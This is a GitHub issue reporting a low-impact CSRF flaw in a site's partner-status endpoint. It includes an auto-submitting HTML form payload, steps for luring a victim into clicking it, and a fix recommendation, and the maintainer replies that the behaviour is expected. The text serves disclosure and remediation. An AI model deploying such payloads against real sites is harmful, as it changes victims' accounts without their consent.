### ISSUE TITLE
CSRF at /setPartner.php?activate=1

### ISSUE THREAD

**Issue by rondons** [The-XSS-Rat/HD-issues#5]
The application lacks protection against Cross-Site Request Forgery (CSRF). This particular CSRF is of low impact, but still present. It allows a user to craft a CSRF payload that will make others look for partners (or to stop looking for them). It can also be used to force someone to abandon an assignment with activate=3 .

**Steps to reproduce:**
1- Craft the following payload and save it:
```
<html>
    <body>
        <form action="https://hackerats.com/setPartner.php?activate=1" method="POST">
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
```
2- serve it on a webserver
3- send the link to someone else.
4- if they click on it, the CSRF is executed and alters their partner status.

![image](https://user-images.githubusercontent.com/73745039/164981371-5ed890eb-ea1b-49f7-b905-49743dc2cc03.png)

**Expected Result**
No change in the state of an account instead of a change to it.

**Recommendations:**
Implement Synchronizer Token Pattern. These are random tokens that are validated by the application, and unpredictable by an attacker.

**Comment by The-XSS-Rat** [comment]
This is a link, expected behaviour
